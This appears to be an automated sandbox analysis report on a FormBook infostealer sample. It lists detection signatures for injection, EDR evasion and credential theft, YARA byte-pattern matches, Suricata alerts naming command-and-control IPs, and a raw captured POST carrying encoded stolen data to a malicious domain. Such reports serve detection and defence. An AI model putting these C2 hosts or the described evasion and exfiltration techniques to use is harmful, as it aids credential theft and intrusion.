Edit tour

Windows Analysis Report
3qsTcL9MOT.exe

Overview

General Information

Sample name:	3qsTcL9MOT.exe renamed because original name is a hash value
Original sample name:	c008649d9be2b5077e0bc9da54d4908fce8b0bd934a5d2ceccc02cbe003fa3cb.exe
Analysis ID:	1530009
MD5:	768fe6ad2d197736577304bf3796f440
SHA1:	4c7556dbd40444365c6f0216bc637773308be11d
SHA256:	c008649d9be2b5077e0bc9da54d4908fce8b0bd934a5d2ceccc02cbe003fa3cb
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

3qsTcL9MOT.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\3qsTcL9MOT.exe" MD5: 768FE6AD2D197736577304BF3796F440)

3qsTcL9MOT.exe (PID: 4816 cmdline: "C:\Users\user\Desktop\3qsTcL9MOT.exe" MD5: 768FE6AD2D197736577304BF3796F440)

GxqFOvQfqyr.exe (PID: 2296 cmdline: "C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

tzutil.exe (PID: 6496 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)

GxqFOvQfqyr.exe (PID: 2276 cmdline: "C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1868 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f2f7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x274d6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17382:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e5c6c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2cde4b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1428f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e5c6c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2cde4b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: 3qsTcL9MOT.exe PID: 1868	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.3qsTcL9MOT.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.3qsTcL9MOT.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17382:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.3qsTcL9MOT.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.3qsTcL9MOT.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:28:46.779937+0200	2855465	1	A Network Trojan was detected	192.168.2.5	49811	194.58.112.174	80	TCP
2024-10-09T16:29:10.254635+0200	2855465	1	A Network Trojan was detected	192.168.2.5	49940	199.59.243.227	80	TCP
2024-10-09T16:29:32.972597+0200	2855465	1	A Network Trojan was detected	192.168.2.5	49990	119.28.49.194	80	TCP
2024-10-09T16:29:46.883651+0200	2855465	1	A Network Trojan was detected	192.168.2.5	49994	72.14.178.174	80	TCP
2024-10-09T16:30:01.819425+0200	2855465	1	A Network Trojan was detected	192.168.2.5	49998	103.144.219.16	80	TCP
2024-10-09T16:30:15.690465+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50002	84.32.84.32	80	TCP
2024-10-09T16:30:29.297199+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50006	47.57.185.227	80	TCP
2024-10-09T16:30:51.514756+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50010	162.0.213.94	80	TCP
2024-10-09T16:31:05.186160+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50014	85.159.66.93	80	TCP
2024-10-09T16:31:18.543535+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50018	217.160.0.147	80	TCP
2024-10-09T16:31:40.913432+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50022	154.23.184.218	80	TCP
2024-10-09T16:31:55.139870+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50026	107.163.96.57	80	TCP
2024-10-09T16:32:09.957220+0200	2855465	1	A Network Trojan was detected	192.168.2.5	50030	45.197.45.172	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:29:02.461248+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49899	199.59.243.227	80	TCP
2024-10-09T16:29:05.000883+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49914	199.59.243.227	80	TCP
2024-10-09T16:29:07.549384+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49927	199.59.243.227	80	TCP
2024-10-09T16:29:25.320418+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49987	119.28.49.194	80	TCP
2024-10-09T16:29:27.854803+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49988	119.28.49.194	80	TCP
2024-10-09T16:29:30.474350+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49989	119.28.49.194	80	TCP
2024-10-09T16:29:38.892769+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49991	72.14.178.174	80	TCP
2024-10-09T16:29:41.389900+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49992	72.14.178.174	80	TCP
2024-10-09T16:29:44.111221+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49993	72.14.178.174	80	TCP
2024-10-09T16:29:54.002269+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49995	103.144.219.16	80	TCP
2024-10-09T16:29:56.519417+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49996	103.144.219.16	80	TCP
2024-10-09T16:29:59.090439+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49997	103.144.219.16	80	TCP
2024-10-09T16:30:07.648135+0200	2855464	1	A Network Trojan was detected	192.168.2.5	49999	84.32.84.32	80	TCP
2024-10-09T16:30:10.231543+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50000	84.32.84.32	80	TCP
2024-10-09T16:30:13.068489+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50001	84.32.84.32	80	TCP
2024-10-09T16:30:21.682723+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50003	47.57.185.227	80	TCP
2024-10-09T16:30:24.210298+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50004	47.57.185.227	80	TCP
2024-10-09T16:30:27.050818+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50005	47.57.185.227	80	TCP
2024-10-09T16:30:43.890467+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50007	162.0.213.94	80	TCP
2024-10-09T16:30:46.614085+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50008	162.0.213.94	80	TCP
2024-10-09T16:30:48.999319+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50009	162.0.213.94	80	TCP
2024-10-09T16:30:58.380676+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50011	85.159.66.93	80	TCP
2024-10-09T16:31:00.927864+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50012	85.159.66.93	80	TCP
2024-10-09T16:31:03.474435+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50013	85.159.66.93	80	TCP
2024-10-09T16:31:10.897628+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50015	217.160.0.147	80	TCP
2024-10-09T16:31:13.437551+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50016	217.160.0.147	80	TCP
2024-10-09T16:31:16.064397+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50017	217.160.0.147	80	TCP
2024-10-09T16:31:32.582682+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50019	154.23.184.218	80	TCP
2024-10-09T16:31:36.236189+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50020	154.23.184.218	80	TCP
2024-10-09T16:31:38.386596+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50021	154.23.184.218	80	TCP
2024-10-09T16:31:47.976759+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50023	107.163.96.57	80	TCP
2024-10-09T16:31:50.682705+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50024	107.163.96.57	80	TCP
2024-10-09T16:31:53.536929+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50025	107.163.96.57	80	TCP
2024-10-09T16:32:02.302843+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50027	45.197.45.172	80	TCP
2024-10-09T16:32:04.856875+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50028	45.197.45.172	80	TCP
2024-10-09T16:32:07.390136+0200	2855464	1	A Network Trojan was detected	192.168.2.5	50029	45.197.45.172	80	TCP

HTTP traffic detected: POST /slxf/ HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.personal-loans-jp8.xyzContent-Length: 207Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.personal-loans-jp8.xyz/slxf/User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18Data Raw: 31 44 64 30 41 5a 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 4b 6e 67 41 38 58 59 33 4f 2f 41 61 71 78 70 4f 6f 6d 4c 50 43 6c 44 4d 45 2b 56 78 74 67 45 31 62 66 41 42 54 72 73 4d 69 6b 6d 79 50 6c 73 31 48 43 38 6c 63 34 30 35 74 67 2b 31 34 54 51 39 6c 2b 39 48 44 4a 33 4c 41 59 39 6f 5a 74 51 63 79 2f 7a 38 79 64 59 58 2f 64 4e 50 4f 6b 49 42 38 70 6e 68 45 67 61 43 6d 34 65 6f 48 56 4e 78 59 72 75 51 6a 54 6e 71 48 61 4f 57 33 59 30 56 6b 4c 37 57 70 41 7a 54 45 70 2b 79 6a 42 55 52 39 47 65 34 53 47 52 56 52 62 4e 62 4b 64 49 66 32 49 4d 6a 71 38 64 69 35 37 4c 6b 46 59 62 36 34 6e 77 34 43 6c 34 2b 51 30 3d Data Ascii: 1Dd0AZ=BZfl/Hh07lNLQKngA8XY3O/AaqxpOomLPClDME+VxtgE1bfABTrsMikmyPls1HC8lc405tg+14TQ9l+9HDJ3LAY9oZtQcy/z8ydYX/dNPOkIB8pnhEgaCm4eoHVNxYruQjTnqHaOW3Y0VkL7WpAzTEp+yjBUR9Ge4SGRVRbNbKdIf2IMjq8di57LkFYb64nw4Cl4+Q0=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:28:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 72 65 64 69 6d 70 61 63 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:29:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:29:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:29:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
